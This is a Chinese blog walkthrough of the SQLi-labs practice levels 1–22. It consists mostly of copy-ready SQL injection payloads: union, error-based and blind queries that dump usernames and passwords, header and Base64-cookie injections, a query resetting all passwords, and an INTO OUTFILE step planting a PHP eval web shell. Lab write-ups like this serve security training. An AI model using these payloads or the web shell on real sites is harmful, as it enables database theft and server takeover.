【SQLi-labs】Basic Challenges(1-22)

Less-1

单引号闭合,union联合注入

id=1' order by 3 --+
id=-1' union select 1,2,3 --+
id=-1' union select 1,database(),3 --+
id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
id=-1' union select 1,group_concat(username,0x7e,password),3 from security.users --+

Less-2

数字型闭合,union联合注入

id=1 and 1=2
id=-1 or 1=1
id=1 order by 3
id=-1 union select 1,2,3

Less-3

单引号+1个括号闭合,union联合注入

id=-1') union select 1,2,3 --+

Less-4

双引号+一个括号,union联合注入

id=-1") union select 1,2,3 --+ 

Less-5

页面只有有和无两种情况,同时也会出现报错信息,判断为报错注入,单引号闭合

id=1' and updatexml(1,concat(0x7e,database()),0) --+
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) --+
id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0) --+
id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from security.users)),0) --+

Less-6

报错注入,双引号闭合

id=1" and updatexml(1,concat(0x7e,database()),0) --+

Less-7

into outfile注入,需要将mysql配置文件my.ini添加

secure_file_priv="/"

添加php一句话木马

http://192.168.223.143/sqli-labs/Less-7/?id=-1%27))%20union select 1,'<?php @eval($_POST["cmd"])?>',3 into outfile "C:/phpStudy/PHPTutorial/WWW/sqli-labs/Less-7/1.php"--+

之后需要用蚁剑或者菜刀连接

Less-8

页面只有有和无两种情况,也没有报错结果,为布尔盲注,单引号闭合

?id=1' and if(ascii(substr(database(),1,1))=115,1,0) --+

Less-9

页面只有一种情况,为时间盲注,单引号闭合

?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0) --+

Less-10

页面只有一种情况,为时间盲注,双引号闭合

?id=1" and if(ascii(substr(database(),1,1))=115,sleep(5),0) --+

Less-11

POST型提交,出现报错,为单引号报错注入

' and updatexml(1,concat(0x7e,database()),0) #

Less-12

POST型提交,出现报错,为双引号+1个括号报错注入

") and updatexml(1,concat(0x7e,database()),0) #

Less-13

POST型提交,出现报错,为单引号+1个括号报错注入

') and updatexml(1,concat(0x7e,database()),0) #

Less-14

POST型提交,出现报错,为双引号报错注入

" and updatexml(1,concat(0x7e,database()),0) #

Less-15

页面只有有和无两种情况,为POST型布尔盲注,单引号闭合

admin' and if(ascii(substr(database(),1,1))=115,1,0)#
' or if(ascii(substr(database(),1,1))=115,1,0)#

Less-16

页面只有有和无两种情况,为POST型布尔盲注,双引号+1个括号闭合

") or if(ascii(substr(database(),1,1))=115,1,0) #

时间盲注经检验也可以,但是可能会一直睡过去

") or if(ascii(substr(database(),1,1))=115,sleep(5),0) #

Less-17

密码重置,将所有用户密码都改为1,输入正确的用户名,并在New Password里输入

' or 1=1 #

在set password=’$passwd’构造闭合,代入后使密码为1,因为后面用户被注释了,没有指定,所以就是全部用户

打过这个实验靶场要还原

Less-18

HTTP头注入,登陆进入后发现给出User Agent字段可修改,即为注入点

User-Agent:'and updatexml(1,concat(0x7e,database()),0) or '1'='1

这里不能用注释符,只能自己构造闭合

Less-19

HTTP头注入,登陆进入后发现给出Referer字段可修改,即为注入点

Referer:' and updatexml(1,concat(0x7e,database()),0) or '1'='1

Less-20

HTTP头注入,登陆进入后发现给出Cookie字段可修改,即为注入点,单引号

Cookie: uname=admin' and updatexml(1,concat(0x7e,database()),0) or '1'='1

Less-21

HTTP头注入,登陆进入后发现给出Cookie字段可修改,即为注入点,但是是Base64编码的,所以要把注入代码全部Base64编码,通过报错发现为单引号闭合

Cookie: uname=admin' and updatexml(1,concat(0x7e,database()),0) or '1'='1
Cookie: uname=YWRtaW4AJyBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSksMCkgb3IgJzEnPScx

Less-22

HTTP头注入,登陆进入后发现给出Cookie字段可修改,即为注入点,但是是Base64编码的,所以要把注入代码全部Base64编码,通过报错发现是双引号闭合

Cookie: uname=" and updatexml(1,concat(0x7e,database()),0) #
Cookie: uname=IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSksMCkgIw==
posted @ 2022-03-20 11:35  icui4cu  阅读(60)  评论(0编辑  收藏  举报